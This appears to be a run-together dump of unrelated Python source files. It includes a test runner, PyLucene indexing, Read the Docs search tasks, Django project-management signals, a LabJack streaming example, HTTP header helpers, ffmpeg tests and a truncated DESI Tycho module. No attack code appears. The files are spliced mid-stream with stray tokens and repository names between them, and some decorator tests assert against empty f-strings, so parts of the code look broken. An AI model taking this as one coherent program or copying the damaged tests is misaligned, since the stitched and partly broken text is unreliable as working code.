stderr while the tests are run. Note that this is independent of stdout output, which is what we are actually testing. """ def get_test_runner_kwargs(self): kwargs = super(StderrSuppressingStdoutCapturingTestRunner, self). 
\ get_test_runner_kwargs() kwargs['stream'] = StringIO() return kwargs class TestStdoutCapturingTestRunner(TestCase): def _run_suite(self, suite): runner = StderrSuppressingStdoutCapturingTestRunner() return runner.run_suite(suite) def test_with_stdout(self): class LoudTestCase(TestCase): def test(self): print('True is true, who knew!') self.assertTrue(True) loud_suite = TestSuite( tests=defaultTestLoader.loadTestsFromTestCase(LoudTestCase) ) with self.assertRaises(RuntimeError): self._run_suite(loud_suite) def test_with_no_stdout(self): class QuietTestCase(TestCase): def test(self): self.assertTrue(True) quiet_suite = TestSuite( tests=defaultTestLoader.loadTestsFromTestCase(QuietTestCase) ) result = self._run_suite(quiet_suite) # No errors should be raised and the suite should have passed self.assertEqual(result.errors, []) self.assertEqual(result.failures, []) #!/usr/bin/python #coding: utf-8 #建索引的文件 import lucene import csv index_dir = '../../data/index/' data_dir = '../../data/corpus.csv' lucene.initVM() directory = lucene.SimpleFSDirectory(lucene.File(index_dir)) analyzer = lucene.StandardAnalyzer(lucene.Version.LUCENE_CURRENT) def build_index(): f = open(data_dir) reader = csv.reader(f) print("开始创建索引") indx = 0 writer = lucene.IndexWriter(directory,analyzer,True, lucene.IndexWriter.MaxFieldLength.UNLIMITED) for line in reader: eng,zh = line[0],line[1] doc = lucene.Document() doc.add(lucene.Field('eng',eng,lucene.Field.Store.YES, lucene.Field.Index.ANALYZED)) doc.add(lucene.Field('zh',zh,lucene.Field.Store.YES, lucene.Field.Index.NOT_ANALYZED)) writer.addDocument(doc) if indx % 100000 == 0: print("%sK"%(indx/1000)) indx += 1 print("写引擎优化") writer.optimize() writer.close() if __name__ == '__main__': build_index() from codecs import open import pandas as pd import json from os import listdir from os.path import isfile, join input_path = 'data/brwac_ref_urls_sentences_v4/' urls = [] files = [] pos = [] file_names = [f for f in listdir(input_path) if isfile(join(input_path, f)) and 'serialized' not in f] j = 0 for file_name in file_names: i = 0 print('({}/{}) {}'.format(j, len(file_names), file_name)) with open(join(input_path, file_name), 'r') as f: for line in f: content = json.loads(line) urls.append(content['docid']) files.append(file_name) pos.append(i) i = i + 1 j = j + 1 df = pd.DataFrame({'docid' : urls, 'file' : files, 'pos' : pos}) df.to_csv(input_path + 'urls_pos.csv', index=False) 10-100 import logging from dateutil.parser import parse from django.apps import apps from django.utils import timezone from django_elasticsearch_dsl.registries import registry from readthedocs.builds.models import Version from readthedocs.projects.models import Project from readthedocs.search.models import SearchQuery from readthedocs.worker import app from .utils import _get_index, _get_document log = logging.getLogger(__name__) @app.task(queue='web') def index_objects_to_es( app_label, model_name, document_class, index_name=None, chunk=None, objects_id=None ): if chunk and objects_id: raise ValueError('You can not pass both chunk and objects_id.') if not (chunk or objects_id): raise ValueError('You must pass a chunk or objects_id.') model = apps.get_model(app_label, model_name) document = _get_document(model=model, document_class=document_class) doc_obj = document() # WARNING: This must use the exact same queryset as from where we get the ID's # There is a chance there is a race condition here as the ID's may change as the task runs, # so we need to think through this a bit more and probably pass 
explicit ID's, # but there are performance issues with that on large model sets queryset = doc_obj.get_queryset() if chunk: # Chunk is a tuple with start and end index of queryset start = chunk[0] end = chunk[1] queryset = queryset[start:end] elif objects_id: queryset = queryset.filter(id__in=objects_id) if index_name: # Hack the index name temporarily for reindexing tasks old_index_name = document._doc_type.index document._doc_type.index = index_name log.info('Replacing index name %s with %s', old_index_name, index_name) log.info("Indexing model: %s, '%s' objects", model.__name__, queryset.count()) doc_obj.update(queryset.iterator()) if index_name: log.info('Undoing index replacement, settings %s with %s', document._doc_type.index, old_index_name) document._doc_type.index = old_index_name @app.task(queue='web') def delete_objects_in_es(app_label, model_name, document_class, objects_id): model = apps.get_model(app_label, model_name) document = _get_document(model=model, document_class=document_class) doc_obj = document() queryset = doc_obj.get_queryset() queryset = queryset.filter(id__in=objects_id) log.info("Deleting model: %s, '%s' objects", model.__name__, queryset.count()) try: # This is a common case that we should be handling a better way doc_obj.update(queryset.iterator(), action='delete') except Exception: log.warning('Unable to delete a subset of files. Continuing.', exc_info=True) @app.task(queue='web') def create_new_es_index(app_label, model_name, index_name, new_index_name): model = apps.get_model(app_label, model_name) indices = registry.get_indices(models=[model]) old_index = _get_index(indices=indices, index_name=index_name) new_index = old_index.clone(name=new_index_name) new_index.create() @app.task(queue='web') def switch_es_index(app_label, model_name, index_name, new_index_name): model = apps.get_model(app_label, model_name) indices = registry.get_indices(models=[model]) old_index = _get_index(indices=indices, index_name=index_name) new_index = old_index.clone(name=new_index_name) old_index_actual_name = None if old_index.exists(): # Alias can not be used to delete an index. # https://www.elastic.co/guide/en/elasticsearch/reference/6.0/indices-delete-index.html # So get the index actual name to delete it old_index_info = old_index.get() # The info is a dictionary and the key is the actual name of the index old_index_actual_name = list(old_index_info.keys())[0] # Put alias into the new index name and delete the old index if its exist new_index.put_alias(name=index_name) if old_index_actual_name: old_index.connection.indices.delete(index=old_index_actual_name) @app.task(queue='web') def index_missing_objects(app_label, model_name, document_class, index_generation_time): """ Task to insure that none of the object is missed from indexing. The object ids are sent to `index_objects_to_es` task for indexing. While the task is running, new objects can be created/deleted in database and they will not be in the tasks for indexing into ES. This task will index all the objects that got into DB after the `latest_indexed` timestamp to ensure that everything is in ES index. 
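    For example, assuming the document's `modified_model_field` is named `modified`, the task
    roughly boils down to indexing `get_queryset().exclude(modified__lte=index_generation_time)`.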
""" model = apps.get_model(app_label, model_name) document = _get_document(model=model, document_class=document_class) query_string = '{}__lte'.format(document.modified_model_field) queryset = document().get_queryset().exclude(**{query_string: index_generation_time}) document().update(queryset.iterator()) log.info("Indexed %s missing objects from model: %s'", queryset.count(), model.__name__) # TODO: Figure out how to remove the objects from ES index that has been deleted @app.task(queue='web') def delete_old_search_queries_from_db(): """ Delete old SearchQuery objects. This is run by celery beat every day. """ last_3_months = timezone.now().date() - timezone.timedelta(days=90) search_queries_qs = SearchQuery.objects.filter( created__date__lte=last_3_months, ) if search_queries_qs.exists(): log.info('Deleting search queries for last 3 months. Total: %s', search_queries_qs.count()) search_queries_qs.delete() @app.task(queue='web') def record_search_query(project_slug, version_slug, query, total_results, time_string): """Record/update search query in database.""" if not project_slug or not version_slug or not query: log.debug( 'Not recording the search query. Passed arguments: ' 'project_slug: %s, version_slug: %s, query: %s, total_results: %s, time: %s' % ( project_slug, version_slug, query, total_results, time_string ) ) return time = parse(time_string) before_10_sec = time - timezone.timedelta(seconds=10) partial_query_qs = SearchQuery.objects.filter( project__slug=project_slug, version__slug=version_slug, created__gte=before_10_sec, ).order_by('-created') # check if partial query exists, # if yes, then just update the object. for partial_query in partial_query_qs.iterator(): if query.startswith(partial_query.query): partial_query.created = time partial_query.query = query partial_query.save() return # don't record query with zero results. if not total_results: log.debug( 'Not recording search query because of zero results. Passed arguments: ' 'project_slug: %s, version_slug: %s, query: %s, total_results: %s, time: %s' % ( project_slug, version_slug, query, total_results, time ) ) return project = Project.objects.filter(slug=project_slug).first() if not project: log.debug( 'Not recording the search query because project does not exist. ' 'project_slug: %s' % ( project_slug ) ) return version_qs = Version.objects.filter(project=project, slug=version_slug) if not version_qs.exists(): log.debug( 'Not recording the search query because version does not exist. ' 'project_slug: %s, version_slug: %s' % ( project_slug, version_slug ) ) return version = version_qs.first() # make a new SearchQuery object. 
obj = SearchQuery.objects.create( project=project, version=version, query=query, ) obj.created = time obj.save() 100-1000 import demistomock as demisto from CommonServerPython import * from CommonServerUserPython import * import ipaddress import traceback ''' COMMAND FUNCTION ''' def return_subnet_network_command(args: Dict[str, Any]) -> CommandResults: subnet = args.get('subnet', None) network = format(ipaddress.IPv4Network(subnet, strict=False).network_address) readable_output = tableToMarkdown(headers='Network:', t=network, name='Subnet Network') return CommandResults( outputs_prefix='IPCalc.IP.Network', outputs_key_field='', readable_output=readable_output, outputs=network, ) ''' MAIN FUNCTION ''' def main(): try: return_results(return_subnet_network_command(demisto.args())) except Exception as ex: demisto.error(traceback.format_exc()) return_error(f'Failed to execute IPCalcReturnSubnetNetwork. Error: {str(ex)}') ''' ENTRY POINT ''' if __name__ in ('__main__', '__builtin__', 'builtins'): main() 1-10 from django.db.models import Q from django.db.models.signals import \ pre_save, \ post_save, \ m2m_changed, \ post_delete from django.conf import settings from django.dispatch import receiver from django.utils.translation import ugettext_lazy as _ from conf.common.mime_settings import FRONTEND_ICON_SET from libs.helpers.strings import shorten_string_to, clean_string, foreign_key_title from libs.sprint.analyser import SprintAnalyser from .api.tasks import send_mentioned_in_message_email, \ send_mentioned_in_description_email from enum import Enum from .models import Project, \ ProjectBacklog, \ IssueTypeCategory, \ IssueStateCategory, \ Sprint, \ Issue, \ IssueMessage, IssueEstimationCategory, SprintEffortsHistory, IssueHistory, IssueTypeCategoryIcon, ProjectWorkingDays class ActionM2M(Enum): PRE_ADD = 'pre_add' POST_ADD = 'post_add' PRE_REMOVE = 'pre_remove' POST_REMOVE = 'post_remove' PRE_CLEAR = 'pre_clear' POST_CLEAR = 'post_clear' @receiver(post_save, sender=Issue) def put_created_issue_to_backlog(instance: Issue, created: bool, **kwargs): """ Lets put just created issue to Backlog. """ if not created: return backlog_with_same_workspace_and_project = ProjectBacklog.objects \ .filter(workspace=instance.workspace, project=instance.project) if backlog_with_same_workspace_and_project.exists(): backlog = backlog_with_same_workspace_and_project.get() backlog.issues.add(instance) """ PROJECT SIGNALS """ @receiver(post_save, sender=Project) def create_backlog_for_project(instance: Project, created: bool, **kwargs): """ Every project should contain only one Backlog. So we provide it. """ if not created: return ProjectBacklog \ .objects \ .create(workspace=instance.workspace, project=instance) @receiver(post_save, sender=Project) def create_project_working_days_settings(instance: Project, created: bool, **kwargs): """ We have to create ProjectWorkingDays for just created Project. 
So that we will be able to create Sprint and calculate BurnDown Chart entries """ if not created: return """ By default we use 5 working days week and UTC timezone Right now timezone does not affect interface and API Cuz USE_TZ=False """ # @todo i have to implement timezone switcher for projects ProjectWorkingDays\ .objects\ .create( workspace=instance.workspace, project=instance, timezone='UTC', monday=True, tuesday=True, wednesday=True, thursday=True, friday=True, saturday=False, sunday=False ) @receiver(post_save, sender=Project) def create_default_issue_type_category_for_project(instance: Project, created: bool, **kwargs): """ Every project should contain defaults Issue Types So we provide it. @todo Better to add default issue types based on current language of project """ issue_types = IssueTypeCategory.objects.filter(workspace=instance.workspace, project=instance) if created and not issue_types.exists(): # Colors from https://quasar.dev/style/color-palette # Icons from https://materialdesignicons.com/ with 'mdi-' prefix icons = \ IssueTypeCategoryIcon.objects.bulk_create([ # Epic IssueTypeCategoryIcon( workspace=instance.workspace, project=instance, prefix='mdi-bag-personal', color='#b366ff', ordering=3 ), # User Story IssueTypeCategoryIcon( workspace=instance.workspace, project=instance, prefix='mdi-bookmark', color='#8ffc77', ordering=1 ), # Task IssueTypeCategoryIcon( workspace=instance.workspace, project=instance, prefix='mdi-file-tree', color='#66b3ff', ordering=2 ), # Bug IssueTypeCategoryIcon( workspace=instance.workspace, project=instance, prefix='mdi-bug', color='#f02222', ordering=0 )] ) IssueTypeCategory.objects.bulk_create([ IssueTypeCategory(workspace=instance.workspace, project=instance, title=_('Epic'), icon=icons[0], is_subtask=False, is_default=False, ordering=0), IssueTypeCategory(workspace=instance.workspace, project=instance, title=_('User Story'), icon=icons[1], is_subtask=True, is_default=True, ordering=1), IssueTypeCategory(workspace=instance.workspace, project=instance, title=_('Task'), icon=icons[2], is_subtask=True, is_default=False, ordering=2), IssueTypeCategory(workspace=instance.workspace, project=instance, title=_('Bug'), icon=icons[3], is_subtask=True, is_default=False, ordering=3) ]) @receiver(post_save, sender=Project) def create_default_issue_state_category_for_project(instance: Project, created: bool, **kwargs): """ Every project should contain issue states. So we provide it. 
@todo Better to add states based on current language of project """ issue_states = IssueStateCategory.objects.filter(workspace=instance.workspace, project=instance) if created and not issue_states.exists(): IssueStateCategory.objects.bulk_create([ IssueStateCategory(workspace=instance.workspace, project=instance, title=_('Todo'), is_default=True, is_done=False), IssueStateCategory(workspace=instance.workspace, project=instance, title=_('In Progress'), is_default=False, is_done=False), IssueStateCategory(workspace=instance.workspace, project=instance, title=_('Verify'), is_default=False, is_done=False), IssueStateCategory(workspace=instance.workspace, project=instance, title=_('Done'), is_default=False, is_done=True) ]) @receiver(post_save, sender=Project) def create_default_issue_estimation_for_project(instance: Project, created: bool, **kwargs): issue_estimations = IssueEstimationCategory.objects.filter(workspace=instance.workspace, project=instance) if created and not issue_estimations.exists(): IssueEstimationCategory\ .objects\ .bulk_create([ IssueEstimationCategory(workspace=instance.workspace, project=instance, title=_('XS'), value=1), IssueEstimationCategory(workspace=instance.workspace, project=instance, title=_('SM'), value=2), IssueEstimationCategory(workspace=instance.workspace, project=instance, title=_('M'), value=3), IssueEstimationCategory(workspace=instance.workspace, project=instance, title=_('L'), value=5), IssueEstimationCategory(workspace=instance.workspace, project=instance, title=_('XL'), value=8), IssueEstimationCategory(workspace=instance.workspace, project=instance, title=_('XXL'), value=13) ]) @receiver(pre_save, sender=Sprint) def create_sprint_history_first_entry_and_set_issues_state_to_default(instance: Sprint, **kwargs): """ Create first history entry for just started sprint """ if not instance.pk: return """ We need to understand state of sprint before. to catch sprint is_started=False -> is_started=True """ state_before = Sprint.objects.get(pk=instance.pk) if any([not instance.is_started, # If updated instance is not start state_before.is_started, # If old instance is started already instance.is_completed]): # Or if updated instance already completed return """ Lets get the default state category """ default_issue_state = IssueStateCategory \ .objects \ .filter( workspace=instance.workspace, project=instance.project, is_default=True ) \ .get() """ We will use it for bulk update then """ objects = [] for issue in instance.issues.all(): issue.state_category = default_issue_state objects.append(issue) """ Updating issues by bulk update """ Issue.objects.bulk_update(objects, ['state_category']) """ If this Sprint was just created - we have to create first History Entry. 
""" project_standard_working_days = ProjectWorkingDays \ .objects \ .get(workspace=instance.workspace, project=instance.project) """ Analysing sprint to get total story points """ sprint_analyser = SprintAnalyser(instance, project_standard_working_days) """ Creating Sprint Efforts History entry with zero completed efforts """ SprintEffortsHistory \ .objects \ .create( sprint=instance, workspace=instance.workspace, project=instance.project, point_at=instance.started_at, total_value=sprint_analyser.calculate_total_story_points(), done_value=sprint_analyser.calculate_completed_story_points() # We can set 0 here, but let's calculate it so far ) @receiver(m2m_changed, sender=Sprint.issues.through) @receiver(m2m_changed, sender=ProjectBacklog.issues.through) def arrange_issue_in_sprints(sender, action, instance, **kwargs): """ 1) Find any sprints that have the same issues. 2) Iterate all over sprints to remove issues that bind to sprint or Backlog from sprints. """ if action != ActionM2M.POST_ADD.value: return base_query = Q(issues__in=instance.issues.all()) additional_query = { sender is Sprint.issues.through: ~Q(id=instance.pk), sender is ProjectBacklog.issues.through: Q() }[True] sprint_with_intersection_of_issues = Sprint.objects \ .filter(base_query, additional_query) if not sprint_with_intersection_of_issues.exists(): return to_remove = instance.issues.values_list('id', flat=True) for _sprint in sprint_with_intersection_of_issues.all(): _sprint.issues.remove(*to_remove) @receiver(m2m_changed, sender=Sprint.issues.through) def arrange_issue_in_backlog(action, instance, **kwargs): """ 1) Find Backlog that have same issues as sender Sprint. 2) Remove that issues from Backlog. """ """ We need to track only post add action """ if action != ActionM2M.POST_ADD.value: return base_query = Q(workspace=instance.workspace) & Q(project=instance.project) & Q(issues__in=instance.issues.all()) to_remove = instance.issues.values_list('id', flat=True) try: backlog = ProjectBacklog.objects.filter(base_query).get() backlog.issues.remove(*to_remove) except ProjectBacklog.DoesNotExist: pass @receiver(post_save, sender=IssueMessage) def signal_mentioned_in_message_emails(instance: IssueMessage, created: bool, **kwargs): """ 1) Check if someone was mentioned 2) Send an email if someone was mentioned """ if any([not created, settings.DEBUG, settings.TESTING]): return send_mentioned_in_message_email.delay(instance.pk) @receiver(post_save, sender=Issue) def signal_mentioned_in_description_emails(instance: Issue, created: bool, **kwargs): """ Send an email if someone was mentioned in issue description """ if any([not created, settings.DEBUG, settings.TESTING]): return send_mentioned_in_description_email.delay(instance.pk) @receiver(post_save, sender=Issue) def signal_sprint_estimation_change(instance: Issue, created: bool, **kwargs): """ Create Sprint Estimation on changing Issue, that belong to started sprint We watching such changes as estimation category and state category """ """ First of all getting started sprint to understand do this issue belong to it""" sprint = Sprint.objects \ .filter(workspace=instance.workspace, project=instance.project, is_started=True, issues__in=[instance]) """ If we don't have a started sprint or this sprint do not include current issue then we just exit """ if not sprint.exists(): return sprint_instance = sprint.get() """ If this Sprint was just created - we have to create first History Entry. 
""" project_standard_working_days = ProjectWorkingDays \ .objects \ .get(workspace=instance.workspace, project=instance.project) """ Analysing sprint to get total story points """ sprint_analyser = SprintAnalyser(sprint_instance, project_standard_working_days) last_history_entry = SprintEffortsHistory \ .objects \ .filter( workspace=instance.workspace, project=instance.project, sprint=sprint_instance ) \ .order_by('-point_at') \ .first() total_sp = sprint_analyser.calculate_total_story_points() completed_sp = sprint_analyser.calculate_completed_story_points() if all([last_history_entry.total_value == total_sp, last_history_entry.done_value == completed_sp]): return sprint_history = SprintEffortsHistory( workspace=instance.workspace, project=instance.project, sprint=sprint_instance, total_value=total_sp, done_value=completed_sp ) sprint_history.save() def set_default_for_instance(instance, sender): """ Just set default is somehow default value was deleted. """ if not instance.is_default: return categories = sender.objects \ .filter(workspace=instance.workspace, project=instance.project) if not categories.exists() or categories.filter(is_default=True).exists(): return new_default_category = categories.all().order_by('id').first() new_default_category.is_default = True new_default_category.save() @receiver(post_delete, sender=IssueTypeCategory) def signal_set_issue_type_category_by_default_if_no_exists(instance: IssueTypeCategory, **kwargs): return set_default_for_instance(instance=instance, sender=IssueTypeCategory) @receiver(post_delete, sender=IssueStateCategory) def signal_set_issue_state_category_by_default_if_no_exists(instance: IssueStateCategory, **kwargs): return set_default_for_instance(instance=instance, sender=IssueStateCategory) @receiver(pre_save, sender=Issue) def signal_set_issue_history(instance: Issue, **kwargs): """ Create History Entry on Issue Changing Pre_save signal is crucial cuz we have to compare instance data with database values. 
""" if not instance.id: return all_fields = Issue._meta.concrete_fields db_version = Issue.objects.get(pk=instance.id) for field in all_fields: _db_value = getattr(db_version, field.name) _instance_value = getattr(instance, field.name) """ If value is the same or we decided do not track it - let's skip it in creating history entry""" if _db_value == _instance_value or \ field.name in settings.PMDRAGON_ISSUE_DO_NOT_WATCH_FIELDS: continue _edited_field_verbose_name = field.verbose_name if field.name in settings.PMDRAGON_ISSUE_FOREIGN_DATA: _str_before = foreign_key_title(_db_value) _str_after = foreign_key_title(_instance_value) else: _str_before = clean_string(_db_value) _str_after = clean_string(_instance_value) _str_before = shorten_string_to(_str_before, 60) _str_after = shorten_string_to(_str_after, 60) """ Issue history instance """ history_entry = IssueHistory( issue=instance, entry_type=FRONTEND_ICON_SET + 'playlist-edit', edited_field=_edited_field_verbose_name, before_value=_str_before, after_value=_str_after, changed_by=instance.updated_by ) history_entry.save() @receiver(post_save, sender=Issue) def signal_set_create_issue_history(instance: Issue, created: bool, **kwargs): """ Create History Entry on Issue Creation """ if not created: return history_entry = IssueHistory( issue=instance, entry_type=FRONTEND_ICON_SET + 'playlist-plus', edited_field=None, before_value=None, after_value=None, changed_by=instance.updated_by ) history_entry.save() import os from django.core.wsgi import get_wsgi_application os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sisjuridico.settings.production") #application = get_wsgi_application() from dj_static import Cling application = Cling(get_wsgi_application()) """ t7_streaming_internal.py Collects streaming data. Data is acquired at a user-defined `samplerate` up to 100000 samples/s. The effective sampling rate per channel is the `samplerate` divided by the number of channels (the default lowest resolution is used for maximum sample rate). Data blocks are collected at a user-defined `readrate' in seconds. Typical values of 0.5 seconds are used for high sample rates. A closed-loop PI controller aiming for a user-defined LabJack backlog is used to account for oscillations in the sleep time between block retrieves. This is accomplished by adjusting the duration of the wait between blocks of data in real time. Once the streaming starts, data must be pulled from the LabJack buffer at the appropriate rate to avoid an overflow. The `backlogSP` parameter defines the backlog set point. Values around 10 % seem reasonable for an itnernal clock streaming. However, `backlogSP` and the PI gains `kp` and `ki` should be adjusted accordingly based on the application. The PI loop is especially useful for extended periods of data acquisition on a T7. On this device, the backlog will drift upwards if a fixed wait time between blocks is used. To observe that behavior, set `kp=0` and `ki=0`. Setup: In this example code, 2 PWM signals are generated on ports FIO0 and FIO4, which in turn should be connected respectively to ports AIN0 and AIN1. The LabJack methods in this example are: set_PWM .......... Sets LabJack configuration for PWM output set_dutycycle .... Sets duty cycle of PWM output (-100 to 100) set_stream ....... Sets LabJack configuration for data streaming get_stream ....... Gets streaming data stop_stream ...... Stops data streaming close ............ 
Closes the LabJack device """ import time import numpy as np from labjack_unified.utils import plot_line from labjack_unified.devices import LabJackT7 # Connecting to LabJackT7 lj = LabJackT7() # Assigning streaming parameters samplerate = 100000 # Samples/s readrate = 0.5 # Block size (s) nblocks = 60 # Number of acquired blocks portlist = ['AIN0', 'AIN1'] # Creating array with dummy values to enable concatenation data = np.zeros((1, len(portlist))) # PI closed loop control of "backlog" size backlogSP = 10 # Desired "backlog" value (%) backlog = [] # Backlog data eprev = 0 # Initial error value uprev = 1 # Initial execution period adjustment factor kp = 0.01 # Proportional gain ki = 0.001 # Integral gain # Setting a PWM output lj.set_pwm(pwmnum=2, frequency=183) lj.set_dutycycle(value1=25, value2=50) # Configuring and starting streaming lj.set_stream(portlist, scanrate=samplerate, readrate=readrate) # Waiting for first block to become available time.sleep(readrate) # Executing acquisition loop for i in range(nblocks): # Starting computational overhead time watch t0 = time.time() # Getting one block of data dt, datablock, numscans, commbacklog, devbacklog = lj.get_stream() # Concatenating last 2 blocks of data for plotting if i > nblocks-3: data = np.vstack((data, datablock)) # Calculating backlog error to set point value e = backlogSP - devbacklog # Calculating execution period adjustment factor u = uprev + kp*(e-eprev) + ki*readrate*e # Updating previous values eprev = e uprev = u # Storing backlog backlog.append(devbacklog) # Showing statistics print('Block :', i+1) print('Scans :', numscans) print('Comm Backlog : {:0.1f}'.format(commbacklog)) print('U3 Backlog : {:0.1f}'.format(devbacklog)) # Pausing taking into account computation overhead thead = time.time()-t0 time.sleep(max(0, u*(readrate-thead))) # Stopping streaming lj.stop_stream() # Closing LabJack lj.close() del lj # Removing first row of dummy data data = data[1::, :] # Creating time array t = dt * np.linspace(0, data.shape[0]-1, data.shape[0]) # Setting x and y arrays for plotting naxes = len(portlist) x = [t] * naxes y = [data[:, i] for i in range(naxes)] # Plotting results plot_line(x, y, yname=portlist, axes='multi') plot_line([np.arange(nblocks)], [backlog], xname='Block Number', yname=['LabJack Backlog (%)']) festicket/connect-sdk-python3 import re def get_header_value(headers, header_name): """ :return: The value of the header with the given name, or None if there was no such header. """ if headers is None: return None for name, value in headers.items(): if name.lower() == header_name.lower(): return value return None def get_header(headers, header_name): """ :return: The header with the given name as a tuple with the name and value, or None if there was no such header. """ if headers is None: return None for name, value in headers.items(): if name.lower() == header_name.lower(): return name, value return None def get_disposition_filename(headers): """ :return: The value of the filename parameter of the Content-Disposition header, or None if there was no such header or parameter. 
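    For example, for the header ``Content-Disposition: attachment; filename="report.pdf"``
    this returns ``report.pdf`` (surrounding single or double quotes are stripped).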
""" header_value = get_header_value(headers, "Content-Disposition") if header_value is None: return None pattern = re.compile( "(?:^|;)\\s*filename\\s*=\\s*(.*?)\\s*(?:;|$)", re.IGNORECASE) match = pattern.search(header_value) if match is not None: filename = match.group(1) return __trim_quotes(filename) return None def __trim_quotes(filename): if len(filename) < 2: return filename if (filename.startswith("\"") and filename.endswith("\"")) or \ (filename.startswith("'") and filename.endswith("'")): return filename[1:-1] return filename 0 from django.contrib import admin from datastores.models import (PostgresDatastore, AzureDatastore, OneDriveDatastore, GoogleDriveDatastore, DropboxDatastore, GoogleCloudStorageDatastore, AzureBlobStorageDatastore, AmazonS3Datastore) admin.site.register(PostgresDatastore) admin.site.register(AzureDatastore) admin.site.register(OneDriveDatastore) admin.site.register(GoogleDriveDatastore) admin.site.register(DropboxDatastore) admin.site.register(GoogleCloudStorageDatastore) admin.site.register(AzureBlobStorageDatastore) admin.site.register(AmazonS3Datastore) # ----- Info ------------------------------------------------------------------ __author__ = ' <>' # ----- Imports --------------------------------------------------------------- from tinyAPI.base.services.ffmpeg import Ffmpeg import tinyAPI import unittest # ----- Tests ----------------------------------------------------------------- class FfmpegTestCase(unittest.TestCase): def test_get_geometry(self): ffmpeg = Ffmpeg('/opt/tinyAPI/base/services/tests/files/video.mov') width, height = ffmpeg.get_geometry() self.assertEqual(160, width) self.assertEqual(120, height) self.assertEqual(160, ffmpeg.width) self.assertEqual(120, ffmpeg.height) def test_get_duration(self): ffmpeg = Ffmpeg('/opt/tinyAPI/base/services/tests/files/video.mov') duration = ffmpeg.get_duration() self.assertEqual(13, duration) # ----- Main ------------------------------------------------------------------ if __name__ == '__main__': unittest.main() # # -*- coding: utf-8 -*- # # @Author: Arrack # @Date: 2020-04-26 21:50:59 # @Last modified by: Arrack # @Last Modified time: 2020-04-27 16:50:01 # import os from app import create_app from dotenv import load_dotenv dotenvPath = os.path.join(os.path.dirname(__file__), '.env') if os.path.exists(dotenvPath): load_dotenv(dotenvPath) app = create_app() if __name__ == '__main__': app.run(debug=True) import perfect from perfect import decorator def test_repr(): id_ = hex(id(perfect)) assert str(perfect) == f"" assert str(perfect.decorator) != f"" assert str(decorator) == str(perfect.decorator) assert repr(perfect) == f"" assert repr(perfect.decorator) != f"" assert repr(decorator) == repr(perfect.decorator) assert perfect is not perfect.decorator assert perfect is not decorator assert perfect.decorator is decorator assert str(perfect()) != f"" assert str(perfect.decorator()) != f"" assert str(decorator()) != f"" assert repr(perfect()) != f"" assert repr(perfect.decorator()) != f"" assert repr(decorator()) != f"" assert str(perfect()).startswith("" assert str(perfect.decorator) != f"" assert str(decorator) == str(perfect.decorator) def wrapped_func(): pass func_id = hex(id(wrapped_func)) func = perfect(wrapped_func) start_str = "function test_wrapped_repr..wrapped_func at" assert str(func) != f"<{start_str} {id_}>" assert str(func) == f"<{start_str} {func_id}>" assert repr(func) != f"<{start_str} {id_}>" assert repr(func) == f"<{start_str} {func_id}>" func = perfect(4711, 1338, a=1, b=2, **{"id": 
55})(wrapped_func) assert str(func) != f"<{start_str} {id_}>" assert str(func) == f"<{start_str} {func_id}>" assert repr(func) != f"<{start_str} {id_}>" assert repr(func) == f"<{start_str} {func_id}>" func = perfect.decorator(wrapped_func) assert str(func) != f"<{start_str} {id_}>" assert str(func) == f"<{start_str} {func_id}>" assert repr(func) != f"<{start_str} {id_}>" assert repr(func) == f"<{start_str} {func_id}>" func = perfect.decorator()(wrapped_func) assert str(func) != f"<{start_str} {id_}>" assert str(func) == f"<{start_str} {func_id}>" assert repr(func) != f"<{start_str} {id_}>" assert repr(func) == f"<{start_str} {func_id}>" py/desitarget/tychomatch.py0 # Licensed under a 3-clause BSD style license - see LICENSE.rst # -*- coding: utf-8 -*- """ ===================== desitarget.tychomatch ===================== Useful Tycho catalog matching and manipulation routines. """ import os import numpy as np import fitsio import requests import pickle from datetime import datetime from pkg_resources import resource_filename from time import time from astropy.io import ascii from glob import glob import healpy as hp from desitarget import io from desitarget.internal import sharedmem from desimodel.footprint import radec2pix from desitarget.geomask import add_hp_neighbors, radec_match_to, nside2nside # ADM set up the DESI default logger from desiutil.log import get_logger log = get_logger() # ADM start the clock start = time() # ADM columns contained in our version of the Tycho fits files. tychodatamodel = np.array([], dtype=[ ('TYC1', '>i2'), ('TYC2', '>i2'), ('TYC3', '|u1'), ('RA', '>f8'), ('DEC', '>f8'), ('MEAN_RA', '>f8'), ('MEAN_DEC', '>f8'), ('SIGMA_RA', '>f4'), ('SIGMA_DEC', '>f4'), # ADM these are converted to be in mas/yr for consistency with Gaia. ('PM_RA', '>f4'), ('PM_DEC', '>f4'), ('SIGMA_PM_RA', '>f4'), ('SIGMA_PM_DEC', '>f4'), ('EPOCH_RA', '>f4'), ('EPOCH_DEC', '>f4'), ('MAG_BT', '>f4'), ('MAG_VT', '>f4'), ('MAG_HP', '>f4'), ('ISGALAXY', '|u1'), ('JMAG', '>f4'), ('HMAG', '>f4'), ('KMAG', '>f4'), ('ZGUESS', '>f4') ]) def get_tycho_dir(): """Convenience function to grab the Tycho environment variable. Returns ------- :class:`str` The directory stored in the $TYCHO_DIR environment variable. """ # ADM check that the $TYCHO_DIR environment variable is set. tychodir = os.environ.get('TYCHO_DIR') if tychodir is None: msg = "Set $TYCHO_DIR environment variable!" log.critical(msg) raise ValueError(msg) return tychodir def get_tycho_nside(): """Grab the HEALPixel nside to be used throughout this module. Returns ------- :class:`int` The HEALPixel nside number for Tycho file creation and retrieval. """ nside = 4 return nside def grab_tycho(cosmodir="/global/cfs/cdirs/cosmo/staging/tycho2/"): """Retrieve the cosmo versions of the Tycho files at NERSC. Parameters ---------- cosmodir : :class:`str` The NERSC directory that hosts the Tycho files. Returns ------- Nothing But the Tycho fits file, README are written to $TYCHO_DIR/fits. Notes ----- - The environment variable $TYCHO_DIR must be set. - The fits file is "cleaned up" to conform to DESI Data Systems standards (e.g. all columns are converted to upper-case). """ # ADM check that the TYCHO_DIR is set and retrieve it. tychodir = get_tycho_dir() # ADM construct the directory to which to write files. fitsdir = os.path.join(tychodir, 'fits') # ADM the directory better be empty for the copy! 
